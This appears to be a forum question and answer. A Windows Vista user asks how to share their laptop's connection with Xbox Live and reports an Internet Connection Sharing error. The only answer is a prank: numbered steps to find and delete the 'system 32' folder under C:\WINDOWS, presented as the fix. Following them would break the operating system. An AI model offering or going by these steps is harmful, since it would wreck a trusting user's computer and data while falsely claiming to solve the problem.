Who do i hook up xbox live from my laptop?

i have windows vista and i have tried everything to set up live i just cant though. I go to control panel, then i go to network and internet, from there i go to network and sharing center, then i go to properties and check the two boxes, then i click ok, then i wait for awhile,then i get this error that says... AN ERROR OCCURRED WHILE INTERNET
CONNECTION SHARING WAS BEING ENABLED... has any body seen that before. if you have please help me i really need help

In order to delete system 32, follow these instructions.
1. Go to "My Computer"
2. Go to "Local Disk (C:).
3. Go to the folder that says "WINDOWS" (in all caps)
4. Scroll Through until you see a file that says "system 32" or use CTRL+F and type in system 32.
5. Delete the file, that should solve your problem.
